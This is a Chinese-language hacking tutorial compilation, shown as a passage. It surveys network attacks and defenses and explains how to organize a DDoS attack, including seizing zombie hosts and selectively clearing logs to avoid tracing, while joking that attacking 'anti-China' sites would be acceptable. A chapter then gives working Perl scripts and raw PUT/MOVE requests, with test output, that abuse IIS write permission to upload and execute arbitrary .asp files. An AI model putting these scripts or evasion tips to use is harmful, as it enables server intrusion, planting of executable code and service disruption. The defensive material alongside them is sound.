防御:要选用难以猜测的口令,比如词和标点符号的组合。确保像NFS、NetBIOS和Telnet这样可利用的服务不暴露在公共范围。如果该服务支持锁定策略,就进行锁定。 特洛伊木马 概览:特洛伊木马是一种或是直接由一个黑客,或是通过一个不令人起疑的用户秘密安装到目标系统的程序。一旦安装成功并取得管理员权限,安装此程序的人就可以直接远程控制目标系统。最有效的一种叫做后门程序,恶意程序包括:NetBus、BackOrifice和BO2k,用于控制系统的良性程序如:netcat、VNC、pcAnywhere。理想的后门程序透明运行。 防御:避免下载可疑程序并拒绝执行,运用网络扫描软件定期监视内部主机上的监听TCP服务。 缓冲区溢出 概览:由于在很多的服务程序中大意的程序员使用象strcpy(),strcat()类似的不进行有效位检查的函数,最终可能导致恶意用户编写一小段利用程序来进一步打开安全豁口然后将该代码缀在缓冲区有效载荷末尾,这样当发生缓冲区溢出时,返回指针指向恶意代码,这样系统的控制权就会被夺取。 防御:利用SafeLib、tripwire这样的程序保护系统,或者浏览最新的安全公告不断更新操作系统。 3、信息收集型攻击 信息收集型攻击并不对目标本身造成危害,如名所示这类攻击被用来为进一步入侵提供有用的信息。主要包括:扫描技术、体系结构刺探、利用信息服务 扫描技术 地址扫描 概览:运用ping这样的程序探测目标地址,对此作出响应的表示其存在。 防御:在防火墙上过滤掉ICMP应答消息。 端口扫描 概览:通常使用一些软件,向大范围的主机连接一系列的TCP端口,扫描软件报告它成功的建立了连接的主机所开的端口。 防御:许多防火墙能检测到是否被扫描,并自动阻断扫描企图。 反响映射 概览:黑客向主机发送虚假消息,然后根据返回“host unreachable”这一消息特征判断出哪些主机是存在的。目前由于正常的扫描活动容易被防火墙侦测到,黑客转而使用不会触发防火墙规则的常见消息类型,这些类型包括:RESET消息、SYN-ACK消息、DNS响应包。 防御:NAT和非路由代理服务器能够自动抵御此类攻击,也可以在防火墙上过滤“host unreachable”ICMP应答。 慢速扫描 概览:由于一般扫描侦测器的实现是通过监视某个时间桢里一台特定主机发起的连接的数目(例如每秒10次)来决定是否在被扫描,这样黑客可以通过使用扫描速度慢一些的扫描软件进行扫描。 防御:通过引诱服务来对慢速扫描进行侦测。 体系结构探测 概览:黑客使用具有已知响应类型的数据库的自动工具,对来自目标主机的、对坏数据包传送所作出的响应进行检查。由于每种操作系统都有其独特的响应方法(例NT和Solaris的TCP/IP堆栈具体实现有所不同),通过将此独特的响应与数据库中的已知响应进行对比,黑客经常能够确定出目标主机所运行的操作系统。 防御:去掉或修改各种Banner,包括操作系统和各种应用服务的,阻断用于识别的端口扰乱对方的攻击计划。 利用信息服务 DNS域转换 概览:DNS协议不对转换或信息性的更新进行身份认证,这使得该协议被人以一些不同的方式加以利用。如果你维护着一台公共的DNS服务器,黑客只需实施一次域转换操作就能得到你所有主机的名称以及内部IP地址。 防御:在防火墙处过滤掉域转换请求。 Finger服务 概览:黑客使用finger命令来刺探一台finger服务器以获取关于该系统的用户的信息。 防御:关闭finger服务并记录尝试连接该服务的对方IP地址,或者在防火墙上进行过滤。 LDAP服务 概览:黑客使用LDAP协议窥探网络内部的系统和它们的用户的信息。 防御:对于刺探内部网络的LDAP进行阻断并记录,如果在公共机器上提供LDAP服务,那么应把LDAP服务器放入DMZ。 4、假消息攻击 用于攻击目标配置不正确的消息,主要包括:DNS高速缓存污染、伪造电子邮件。 DNS高速缓存污染 概览:由于DNS服务器与其他名称服务器交换信息的时候并不进行身份验证,这就使得黑客可以将不正确的信息掺进来并把用户引向黑客自己的主机。 防御:在防火墙上过滤入站的DNS更新,外部DNS服务器不应能更改你的内部服务器对内部机器的认识。 伪造电子邮件 概览:由于SMTP并不对邮件的发送者的身份进行鉴定,因此黑客可以对你的内部客户伪造电子邮件,声称是来自某个客户认识并相信的人,并附带上可安装的特洛伊木马程序,或者是一个引向恶意网站的连接。 防御:使用PGP等安全工具并安装电子邮件证书。 此外有篇文章,在这值得所有人看看:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=699 第26章 DDOS攻击 好了 今天我们来说说 DDOS 攻击 这里我不准备提供任何工具的下载地址 因为我反对不聊的攻击 如果你攻击反华网站还差不多 其实在前几天我总结过网络攻击的几种形式(详见:http://www.91one.net/dvbbs/dispbbs.asp?boardID=16&ID=698) 也就几种:1。务拒绝攻击------死亡之ping (ping of death) 泪滴(teardrop) UDP洪水(UDP flood) SYN洪水(SYN flood)--现在最流行的DDOS攻击的一种 Land攻击 Smurf攻击 Fraggle攻击 电子邮件炸弹 畸形消息攻击 2。利用型攻击 3。信息收集型攻击 4。假消息攻击 这里我就不详细说明了 大家可以参考上篇文章 当然DDOS是属于网络攻击里的 我是这么理解的 有的人把网络攻击和DDOS攻击连同是 不对的 虽然现在主要是才用DDOS 但也不能“抹杀”其他一些攻击方式的辉煌啊 要想理解DDoS的概念,我们就必须先介绍一下DoS(拒绝服务),DoS的英文全称是Denial of Service,也就是“拒绝服务”的意思。从网络攻击的各种方法和所产生的破坏情况来看,DoS算是一种很简单但又很有效的进攻方式。它的目的就是拒绝你的服务访问,破坏组织的正常运行,最终它会使你的部分Internet连接和网络系统失效。DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务。DoS攻击的原理如图1所示。 从图1我们可以看出DoS攻击的基本过程:首先攻击者向服务器发送众多的带有虚假地址的请求,服务器发送回复信息后等待回传信息,由于地址是伪造的,所以服务器一直等不到回传的消息,分配给这次请求的资源就始终没有被释放。当服务器等待一定的时间后,连接会因超时而被切断,攻击者会再度传送新的一批请求,在这种反复发送伪地址请求的情况下,服务器资源最终会被耗尽。 DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的,当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。随着计算机与网络技术的发展,计算机的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得DoS攻击的困难程度加大了-目标对恶意攻击包的"消化能力"加强了不少,例如你的攻击软件每秒钟可以发送3,000个攻击包,但我的主机与网络带宽每秒钟可以处理10,000个攻击包,这样一来攻击就不会产生什么效果。 这时侯分布式的拒绝服务攻击手段(DDoS)就应运而生了。你理解了DoS攻击的话,它的原理就很简单。如果说计算机与网络的处理能力加大了10倍,用一台攻击机来攻击不再能起作用的话,攻击者使用10台攻击机同时攻击呢?用100台呢?DDoS就是利用更多的傀儡机来发起进攻,以比从前更大的规模来进攻受害者。 高速广泛连接的网络给大家带来了方便,也为DDoS攻击创造了极为有利的条件。在低速网络时代时,黑客占领攻击用的傀儡机时,总是会优先考虑离目标网络距离近的机器,因为经过路由器的跳数少,效果好。而现在电信骨干节点之间的连接都是以G为级别的,大城市之间更可以达到2.5G的连接,这使得攻击可以从更远的地方或者其他城市发起,攻击者的傀儡机位置可以在分布在更大的范围,选择起来更灵活了。 被DDoS攻击时的现象 被攻击主机上有大量等待的TCP连接 网络中充斥着大量的无用的数据包,源地址为假 制造高流量无用数据,造成网络拥塞,使受害主机无法正常和外界通讯 利用受害主机提供的服务或传输协议上的缺陷,反复高速的发出特定的服务请求,使受害主机无法及时处理所有正常请求 严重时会造成系统死机 攻击运行原理 如图,一个比较完善的DDoS攻击体系分成四大部分,先来看一下最重要的第2和第3部分:它们分别用做控制和实际发起攻击。请注意控制机与攻击机的区别,对第4部分的受害者来说,DDoS的实际攻击包是从第3部分攻击傀儡机上发出的,第2部分的控制机只发布命令而不参与实际的攻击。对第2和第3部分计算机,黑客有控制权或者是部分的控制权,并把相应的DDoS程序上传到这些平台上,这些程序与正常的程序一样运行并等待来自黑客的指令,通常它还会利用各种手段隐藏自己不被别人发现。在平时,这些傀儡机器并没有什么异常,只是一旦黑客连接到它们进行控制,并发出指令的时候,攻击傀儡机就成为害人者去发起攻击了。 有的朋友也许会问道:"为什么黑客不直接去控制攻击傀儡机,而要从控制傀儡机上转一下呢?"。这就是导致DDoS攻击难以追查的原因之一了。做为攻击者的角度来说,肯定不愿意被捉到,而攻击者使用的傀儡机越多,他实际上提供给受害者的分析依据就越多。在占领一台机器后,高水平的攻击者会首先做两件事:1.考虑如何留好后门(我以后还要回来的哦)!2.如何清理日志。这就是擦掉脚印,不让自己做的事被别人查觉到。比较不敬业的黑客会不管三七二十一把日志全都删掉,但这样的话网管员发现日志都没了就会知道有人干了坏事了,顶多无法再从日志发现是谁干的而已。相反,真正的好手会挑有关自己的日志项目删掉,让人看不到异常的情况。这样可以长时间地利用傀儡机。 但是在第3部分攻击傀儡机上清理日志实在是一项庞大的工程,即使在有很好的日志清理工具的帮助下,黑客也是对这个任务很头痛的。这就导致了有些攻击机弄得不是很干净,通过它上面的线索找到了控制它的上一级计算机,这上级的计算机如果是黑客自己的机器,那么他就会被揪出来了。但如果这是控制用的傀儡机的话,黑客自身还是安全的。控制傀儡机的数目相对很少,一般一台就可以控制几十台攻击机,清理一台计算机的日志对黑客来讲就轻松多了,这样从控制机再找到黑客的可能性也大大降低。 如何组织一次DDoS攻击的? 这里用"组织"这个词,是因为DDoS并不象入侵一台主机那样简单。一般来说,黑客进行DDoS攻击时会经过这样的步骤: 1.搜集了解目标的情况 下列情况是黑客非常关心的情报: 被攻击目标主机数目、地址情况 目标主机的配置、性能 目标的带宽 对于DDoS攻击者来说,攻击互联网上的某个站点,如http://www.WWWW.com,有一个重点就是确定到底有多少台主机在支持这个站点,一个大的网站可能有很多台主机利用负载均衡技术提供同一个网站的www服务。以yahoo为例,一般会有下列地址都是提供http://www.WWW.com服务的: 66.218.71.87 66.218.71.88 66.218.71.89 66.218.71.80 66.218.71.81 66.218.71.83 66.218.71.84 66.218.71.86 如果要进行DDoS攻击的话,应该攻击哪一个地址呢?使66.218.71.87这台机器瘫掉,但其他的主机还是能向外提供www服务,所以想让别人访问不到http://www.WWW.com的话,要所有这些IP地址的机器都瘫掉才行。在实际的应用中,一个IP地址往往还代表着数台机器:网站维护者使用了四层或七层交换机来做负载均衡,把对一个IP地址的访问以特定的算法分配到下属的每个主机上去。这时对于DDoS攻击者来说情况就更复杂了,他面对的任务可能是让几十台主机的服务都不正常。 所以说事先搜集情报对DDoS攻击者来说是非常重要的,这关系到使用多少台傀儡机才能达到效果的问题。简单地考虑一下,在相同的条件下,攻击同一站点的2台主机需要2台傀儡机的话,攻击5台主机可能就需要5台以上的傀儡机。有人说做攻击的傀儡机越多越好,不管你有多少台主机我都用尽量多的傀儡机来攻就是了,反正傀儡机超过了时候效果更好。 但在实际过程中,有很多黑客并不进行情报的搜集而直接进行DDoS的攻击,这时候攻击的盲目性就很大了,效果如何也要*运气。其实做黑客也象网管员一样,是不能偷懒的。一件事做得好与坏,态度最重要,水平还在其次。 2.占领傀儡机 黑客最感兴趣的是有下列情况的主机: 链路状态好的主机 性能好的主机 安全管理水平差的主机 这一部分实际上是使用了另一大类的攻击手段:利用形攻击。这是和DDoS并列的攻击方式。简单地说,就是占领和控制被攻击的主机。取得最高的管理权限,或者至少得到一个有权限完成DDoS攻击任务的帐号。对于一个DDoS攻击者来说,准备好一定数量的傀儡机是一个必要的条件,下面说一下他是如何攻击并占领它们的。 首先,黑客做的工作一般是扫描,随机地或者是有针对性地利用扫描器去发现互联网上那些有漏洞的机器,象程序的溢出漏洞、cgi、Unicode、ftp、数据库漏洞…(简直举不胜举啊),都是黑客希望看到的扫描结果。随后就是尝试入侵了,具体的手段就不在这里多说了,感兴趣的话网上有很多关于这些内容的文章。 总之黑客现在占领了一台傀儡机了!然后他做什么呢?除了上面说过留后门擦脚印这些基本工作之外,他会把DDoS攻击用的程序上载过去,一般是利用ftp。在攻击机上,会有一个DDoS的发包程序,黑客就是利用它来向受害目标发送恶意攻击包的。 3.实际攻击 经过前2个阶段的精心准备之后,黑客就开始瞄准目标准备发射了。前面的准备做得好的话,实际攻击过程反而是比较简单的。就象图示里的那样,黑客登录到做为控制台的傀儡机,向所有的攻击机发出命令:"预备~ ,瞄准~,开火!"。这时候埋伏在攻击机中的DDoS攻击程序就会响应控制台的命令,一起向受害主机以高速度发送大量的数据包,导致它死机或是无法响应正常的请求。黑客一般会以远远超出受害方处理能力的速度进行攻击,他们不会"怜香惜玉"。 老到的攻击者一边攻击,还会用各种手段来监视攻击的效果,在需要的时候进行一些调整。简单些就是开个窗口不断地ping目标主机,在能接到回应的时候就再加大一些流量或是再命令更多的傀儡机来加入攻击。 下面我们再详细说说SYN Flood攻击 SYN-Flood是目前最流行的DDoS攻击手段,早先的DoS的手段在向分布式这一阶段发展的时候也经历了浪里淘沙的过程。SYN-Flood的攻击效果最好,应该是众黑客不约而同选择它的原因吧。那么我们一起来看看SYN-Flood的详细情况。 Syn Flood原理 - 三次握手 Syn Flood利用了TCP/IP协议的固有漏洞。面向连接的TCP三次握手是Syn Flood存在的基础。 TCP连接的三次握手 如图,在第一步中,客户端向服务端提出连接请求。这时TCP SYN标志置位。客户端告诉服务端序列号区域合法,需要检查。客户端在TCP报头的序列号区中插入自己的ISN。服务端收到该TCP分段后,在第二步以自己的ISN回应(SYN标志置位),同时确认收到客户端的第一个TCP分段(ACK标志置位)。在第三步中,客户端确认收到服务端的ISN(ACK标志置位)。到此为止建立完整的TCP连接,开始全双工模式的数据传输过程。 Syn Flood攻击者不会完成三次握手 假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,这种情况我们称做:服务器端受到了SYN Flood攻击(SYN洪水攻击)。 下面我们来分析一下这些经典的黑客程序。 1、Trinoo Trinoo的攻击方法是向被攻击目标主机的随机端口发出全零的4字节UDP包,在处理这些超出其处理能力的垃圾数据包的过程中,被攻击主机的网络性能不断下降,直到不能提供正常服务,乃至崩溃。它对IP地址不做假,采用的通讯端口是: 攻击者主机到主控端主机:27665/TCP 主控端主机到代理端主机:27444/UDP 代理端主机到主服务器主机:31335/UDP 2、TFN TFN由主控端程序和代理端程序两部分组成,它主要采取的攻击方法为:SYN风暴、Ping风暴、UDP炸弹和SMURF,具有伪造数据包的能力。 3、TFN2K TFN2K是由TFN发展而来的,在TFN所具有的特性上,TFN2K又新增一些特性,它的主控端和代理端的网络通讯是经过加密的,中间还可能混杂了许多虚假数据包,而TFN对ICMP的通讯没有加密。攻击方法增加了Mix和Targa3。并且TFN2K可配置的代理端进程端口。 4、Stacheldraht Stacheldraht也是从TFN派生出来的,因此它具有TFN的特性。此外它增加了主控端与代理端的加密通讯能力,它对命令源作假,可以防范一些路由器的RFC2267过滤。Stacheldrah中有一个内嵌的代理升级模块,可以自动下载并安装最新的代理程序。 DDoS的监测 检测DDoS攻击的主要方法有以下几种: 1、根据异常情况分析 当网络的通讯量突然急剧增长,超过平常的极限值时,你可一定要提高警惕,检测此时的通讯;当网站的某一特定服务总是失败时,你也要多加注意;当发现有特大型的ICP和UDP数据包通过或数据包内容可疑时都要留神。总之,当你的机器出现异常情况时,你最好分析这些情况,防患于未然。 2、使用DDoS检测工具 当攻击者想使其攻击阴谋得逞时,他首先要扫描系统漏洞,目前市面上的一些网络入侵检测系统,可以杜绝攻击者的扫描行为。另外,一些扫描器工具可以发现攻击者植入系统的代理程序,并可以把它从系统中删除。 DDoS的防范 到目前为止,进行DDoS攻击的防御还是比较困难的。首先,这种攻击的特点是它利用了TCP/IP协议的漏洞,除非你不用TCP/IP,才有可能完全抵御住DDoS攻击。一位资深的安全专家给了个形象的比喻:DDoS就好象有1,000个人同时给你家里打电话,这时候你的朋友还打得进来吗? 不过即使它难于防范,也不是说我们就应该逆来顺受,实际上防止DDoS并不是绝对不可行的事情。互联网的使用者是各种各样的,与DDoS做斗争,不同的角色有不同的任务。我们以下面几种角色为例: 企业网管理员 ISP、ICP管理员 骨干网络运营商 企业网管理员 网管员做为一个企业内部网的管理者,往往也是安全员、守护神。在他维护的网络中有一些服务器需要向外提供WWW服务,因而不可避免地成为DDoS的攻击目标,他该如何做呢?可以从主机与网络设备两个角度去考虑。 主机上的设置 几乎所有的主机平台都有抵御DoS的设置,总结一下,基本的有几种: 关闭不必要的服务 限制同时打开的Syn半连接数目 缩短Syn半连接的time out 时间 及时更新系统补丁 网络设备上的设置 企业网的网络设备可以从防火墙与路由器上考虑。这两个设备是到外界的接口设备,在进行防DDoS设置的同时,要注意一下这是以多大的效率牺牲为代价的,对你来说是否值得。 1.防火墙 禁止对主机的非开放服务的访问 限制同时打开的SYN最大连接数 限制特定IP地址的访问 启用防火墙的防DDoS的属性 严格限制对外开放的服务器的向外访问 第五项主要是防止自己的服务器被当做工具去害人。 2.路由器 以Cisco路由器为例 Cisco Express Forwarding(CEF) 使用 unicast reverse-path 访问控制列表(ACL)过滤 设置SYN数据包流量速率 升级版本过低的ISO 为路由器建立log server 其中使用CEF和Unicast设置时要特别注意,使用不当会造成路由器工作效率严重下降,升级IOS也应谨慎。路由器是网络的核心设备,与大家分享一下进行设置修改时的小经验,就是先不保存。Cisco路由器有两份配置startup config和running config,修改的时候改变的是running config,可以让这个配置先跑一段时间(三五天的就随意啦),觉得可行后再保存配置到startup config;而如果不满意想恢复原来的配置,用copy start run就行了。 ISP / ICP管理员 ISP / ICP为很多中小型企业提供了各种规模的主机托管业务,所以在防DDoS时,除了与企业网管理员一样的手段外,还要特别注意自己管理范围内的客户托管主机不要成为傀儡机。客观上说,这些托管主机的安全性普遍是很差的,有的连基本的补丁都没有打就赤膊上阵了,成为黑客最喜欢的"肉鸡",因为不管这台机器黑客怎么用都不会有被发现的危险,它的安全管理太差了;还不必说托管的主机都是高性能、高带宽的-简直就是为DDoS定制的。而做为ISP的管理员,对托管主机是没有直接管理的权力的,只能通知让客户来处理。在实际情况时,有很多客户与自己的托管主机服务商配合得不是很好,造成ISP管理员明知自己负责的一台托管主机成为了傀儡机,却没有什么办法的局面。而托管业务又是买方市场,ISP还不敢得罪客户,怎么办?咱们管理员和客户搞好关系吧,没办法,谁让人家是上帝呢?呵呵,客户多配合一些,ISP的主机更安全一些,被别人告状的可能性也小一些。 骨干网络运营商 这个我们就不说了 因为我们都不是骨干运营商 第27章 深入对iis写权限的利用 这篇分析文章是一个朋友转给我看的,我觉得真的不错,所以就只是做点术语的修改,请大家了解 原文 大家可能看过《远程分析IIS设置》,里面对iis的各种设置进行了分析,我这里就对iis的写权限来分析下,以下引用《远程分析IIS设置》文章对iis写权限分析内容: 写权限 测试一个目录对于web用户是否具有写权限,采用如下方法:telnet到服务器的web端口(80)并发送一个如下请求: PUT /dir/my_file.txt HTTP/1.1 Host: iis-server Content-Length: 10 这时服务器会返回一个100( 继续)的信息: HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Thu, 28 Feb 2002 15:56:00 GMT 接着,我们输入10个字母: AAAAAAAAAA 送出这个请求后,看服务器的返回信息,如果是一个 201 Created响应: HTTP/1.1 201 Created Server: Microsoft-IIS/5.0 Date: Thu, 28 Feb 2002 15:56:08 GMT Location: http://iis-server/dir/my_file.txt Content-Length: 0 Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK 那么就说明这个目录的写权限是开着的,反之,如果返回的是一个403错误,那么写权限就是没有开起来,如果需要你认证,并且返回一个 401(权限禁止) 的响应的话,说明是开了写权限,但是匿名用户不允许。如果一个目录同时开了”写”和“脚本和可执行程序”的话,那么web用户就可以上传一个程序并且执行它,恐怖哦%^#$!~ 这里简单说明下: PUT /dir/my_file.txt HTTP/1.1 Host: iis-server Content-Length: 10 PUT:请求服务器将附件的实体储存在提供的请求URL处,如果该请求URL指向的资源已经存在,则附件实体应被看做是当前原始服务器上资源的修改版本。如果请求URL没有指向现存的资源,该URL将被该请求的用户代理定义成为一个新的资源,原始服务器将用该URL产生这个资源。 Host:是HTTP请求的发送地址 Content-Length:是内容长度,也就是实体长度,该长度值和上传的文件大小一致 用nc(telnet)提交很烦琐,我们这里写个简单的perl程序,来完成这个复杂的提交过程,在写代码时我们用binmode()方式打开文件,代码如下: #!/usr/bin/perl use I:Socket; $ARGC = @ARGV; if ($ARGC != 4) { print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n"; exit; } $host = @ARGV[0]; $port = @ARGV[1]; $file = @ARGV[2]; $path = @ARGV[3]; @s=stat("$file"); $size = $s[7]; #得到文件大小 print "$file size is $size bytes\n"; my $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $sock "PUT $path HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Content-Length: $size\n\n"; #sock连接 open(FILE,"$file"); binmode(FILE); #用2进制打开文件 while (read(FILE,$char,1024)) { #读取文件数据上传 print $sock "$char"; } print $sock "\n\n"; @req = <$sock>; print "please wait...\n"; sleep(2); if ($req[4]=~/200|201/){ print "upfile Succeed!!!" ; #成功显示 } else{ print "upfile faile!!!\n\n"; print @req;#如果失败显示返回错误 } close $sock; close FILE; 下面我们测试下: C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.txt /Scripts/kaka.txt kaka.txt size is 14 bytes please wait... upfile Succeed!!! C:\Inetpub\Scripts>dir kaka.txt 驱动器 C 中的卷没有标签。 卷的序列号是 3CD1-479E C:\Inetpub\Scripts 的目录 2004-05-05 00:37 14 kaka.txt 1 个文件 14 字节 0 个目录 3,871,080,448 可用字节 这里我们把kaka.txt成功上传到了web目录Scripts下,以为程序中用了binmode()方式(2进制)打开文件,应该可以上传其他文件,我们先测试下exe文件: C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 perl.exe /Scripts/perl.exe perl.exe size is 20535 bytes please wait... upfile Succeed!!! C:\Inetpub\Scripts>dir perl.exe 驱动器 C 中的卷没有标签。 卷的序列号是 3CD1-479E C:\Inetpub\Scripts 的目录 2004-05-05 00:42 20,535 perl.exe 1 个文件 20,535 字节 0 个目录 3,871,031,296 可用字节 成功,可以上传exe了,是不是可以上传任意文件呢?接着来测试asp文件: C:\usr\bin>perl.exe iiswt.pl 127.0.0.1 80 kaka.asp /Scripts/kaka.asp kaka.asp size is 4 bytes please wait... upfile faile!!! HTTP/1.1 100 Continue Server: Microsoft-IIS/5.0 Date: Tue, 04 May 2004 16:45:51 GMT HTTP/1.1 403 Forbidden Server: Microsoft-IIS/5.0 Date: Tue, 04 May 2004 16:45:51 GMT Connection: close Content-Type: text/html Content-Length: 44 HTTP/1.1 403 Forbidden 失败!!提示HTTP/1.1 403 Forbidden错误,看来直接用post方式写asp不行了,经过测试只要是iis支持的文件类型都会产生HTTP/1.1 403 Forbidden错误。 那我们怎样才可以上传iis支持的文件类型文件呢?iis除了可以执行put,post,get等动作外,还可以执行COPY, MOVE等命令,呵呵!我们这可以先把本地asp上传到远程主机web目录下的txt等其他文件,在提过copy,move命令来改为asp。 我们还是先用nc提交测试下: D:\>nc 127.0.0.1 80 MOVE /scripts/kaka.txt HTTP/1.1 Host:127.0.0.1 Destination: http://127.0.0.1/scripts/kaka.asp HTTP/1.1 201 Created Server: Microsoft-IIS/5.0 Date: Sun, 05 Oct 2003 09:30:59 GMT Location: http://127.0.0.1/scripts/x.asp Content-Type: text/xml Content-Length: 0 成功利用MOVE把/scripts/kaka.txt改名/scripts/kaka.asp。这样我们就可以结合put和move来完成通过iis写容易文件了:)。我们还是用perl来完成。 测试写asp成功: C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp ************************************************************ codz by ≯SuperHei && lanker ************************************************************ kaka.asp size is 4 bytes please wait... upfile Succeed!!! Modifyfile Succeed!!! 最终的iiswrite.pl代码如下(由于写本文时,在网吧对于文章中代码是先又本人打“草稿”,又lanker测试并最终完成,THX lanker。): #!/usr/bin/perl #The iiswrite Script use I:Socket; $ARGC = @ARGV; print "*" x 60; print "\ncodz by ≯SuperHei && lanker\n"; print "*" x 60,"\n"; if ($ARGC != 4) { print "usage:$0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n"; exit; } $host = @ARGV[0]; $port = @ARGV[1]; $path = @ARGV[3]; $file = @ARGV[2]; @path=split("/",$path); $any = pop(@path); $path1=join("/",@path); @s=stat("$file"); $size = $s[7]; print "$file size is $size bytes\n"; my $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $sock "PUT $path1/lanker.txt HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Content-Length: $size\n\n"; open(FILE,"$file")|| die "Can't open $file"; binmode(FILE); while (read(FILE,$char,1024)) { print $sock "$char"; } print $sock "\n\n"; @req = <$sock>; print "please wait...\n"; sleep(2); if ($req[4]=~/200|201/){ print "upfile Succeed!!!\n" ; } else{ print "upfile faile!!!\n"; } close $sock; close FILE; my $sock = I:Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $sock "MOVE $path1/lanker.txt HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Destination:http://$host:$port$path\n\n\n\n"; @req = <$sock>; if ($req[0]=~/20\d+|/){ print "Modifyfile Succeed!!!" ; } else{ print "upfile faile!!!"; } close $sock; 第28章 (1)[system Idle Process] 进程文件: [system process] or [system process] 进程名称: Windows内存处理系统进程 描 述: Windows页面内存管理进程,拥有0级优先。 介 绍:该进程作为单线程运行在每个处理器上,并在系统不处理其他线程的时候分派处理器的时间。它的cpu占用率越大表示可供分配的CPU资源越多,数字越小则表示CPU资源紧张。 (2)[alg.exe] 进程文件: alg or alg.exe 进程名称: 应用层网关服务 描 述: 这是一个应用层网关服务用于网络共享。 介 绍:一个网关通信插件的管理器,为 “Internet连接共享服务”和 “Internet连接防火墙服务”提供第三方协议插件的支持。 (3)[csrss.exe] 进程文件: csrss or csrss.exe 进程名称: Client/Server Runtime Server Subsystem 描 述: 客户端服务子系统,用以控制Windows图形相关子系统。 介 绍: 这个是用户模式Win32子系统的一部分。csrss代表客户/服务器运行子系统而且是一个基本的子系统必须一直运行。csrss用于维持Windows的控制,创建或者删除线程和一些16位的虚拟MS-DOS环境。 (4)[ddhelp.exe] 进程文件: ddhelp or ddhelp.exe 进程名称: DirectDraw Helper 描 述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。 简 介:Directx 帮助程序 (5)[dllhost.exe] 进程文件: dllhost or dllhost.exe 进程名称: DCOM DLL Host进程 描 述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。 介 绍:com代理,系统附加的dll组件越多,则dllhost占用的cpu资源和内存资源就越多,而8月的“冲击波杀手”大概让大家对它比较熟悉吧。 (6)[explorer.exe] 进程文件: explorer or explorer.exe 进程名称: 程序管理 描 述: Windows Program Manager或者Windows Explorer用于控制Windows图形Shell,包括开始菜单、任务栏,桌面和文件管理。 介 绍:这是一个用户的shell,在我们看起来就像任务条,桌面等等。或者说它就是资源管理器,不相信你在运行里执行它看看。它对windows系统的稳定性还是比较重要的,而红码也就是找它的麻烦,在c和d根下创建explorer.exe。 (7)[inetinfo.exe] 进程文件: inetinfo or inetinfo.exe 进程名称: IIS Admin Service Helper 描 述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分,用于Debug调试除错。 介 绍:IIS服务进程,蓝码正是利用的inetinfo.exe的缓冲区溢出漏洞。 (8)[internat.exe] 进程文件: internat or internat.exe 进程名称: Input Locales 描 述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。internat.exe在启动的时候开始运行。它加载由用户指定的不同的输入点。输入点是从注册表的这个位置HKEY_USERS\.DEFAULT\Keyboard Layout\Preload 加载内容的。internat.exe 加载“EN”图标进入系统的图标区,允许使用者可以很容易的转换不同的输入点。当进程停掉的时候,图标就会消失,但是输入点仍然可以通过控制面板来改变。 介 绍:它主要是用来控制输入法的,当你的任务栏没有“EN”图标,而系统有internat.exe进程,不妨结束掉该进程,在运行里执行internat命令即可。 (9)[kernel32.dll] 进程文件: kernel32 or kernel32.dll 进程名称: Windows壳进程 描 述: Windows壳进程用于管理多线程、内存和资源。 介 绍:更多内容浏览非法操作与Kernel32解读 (10)[lsass.exe] 进程文件: lsass or lsass.exe 进程名称: 本地安全权限服务 描 述: 这个本地安全权限服务控制Windows安全机制。管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序等。 介 绍:这是一个本地的安全授权服务,并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是通过使用授权的包,例如默认的msgina.dll来执行的。如果授权是成功的,lsass就会产生用户的进入令牌,令牌别使用启动初始的shell。其他的由用户初始化的进程会继承这个令牌的。而windows活动目录远程堆栈溢出漏洞,正是利用LDAP 3搜索请求功能对用户提交请求缺少正确缓冲区边界检查,构建超过1000个"AND"的请求,并发送给服务器,导致触发堆栈溢出,使Lsass.exe服务崩溃,系统在30秒内重新启动。 (11)[mdm.exe] 进程文件: mdm or mdm.exe 进程名称: Machine Debug Manager 描 述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft Script Editor脚本编辑器。 介 